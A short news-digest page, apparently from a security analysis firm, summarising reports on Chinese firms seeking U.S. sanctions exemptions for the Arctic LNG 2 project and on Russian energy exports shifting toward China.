FROM THE MEDIA: According to Reuters, both CNPC and CNOOC, with a 10% stake each in the Arctic LNG 2 project, have sought exemptions from U.S. sanctions recently imposed in response to the ongoing war in Ukraine. These sanctions could impede LNG vessels servicing the project and threaten the companies' other international engagements, including LNG purchases from the United States. As the project is vital for Russia's aim to expand its global LNG market share and significant for the energy strategies of other stakeholders like France's TotalEnergies and Japan Arctic LNG, the outcome of these exemption requests could have substantial implications for global LNG supply and geopolitical relations. The U.S. State Department's engagement with partner countries over the sanctions indicates the diplomatic sensitivities and economic stakes involved.
READ THE STORY: Reuters
Historic shift in Russian energy flows, becomes China's 4th largest LNG supplier (Video)
FROM THE MEDIA: The coordinated sanctions imposed on Russian oil and gas by the US, Europe and their Pacific allies have led to a historic shift in the direction of the Russian energy flow. China, which already is a huge importer of Russian energy supplies has been soaking up more Russian natural gas as compared to the previous years.
How China Plans to Win the Future of Energy (Video)
FROM THE MEDIA: China, the world’s biggest polluter, has committed to reach net zero emissions by 2060, an ambitious goal matched by enormous investments that are reshaping the nation’s energy system.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.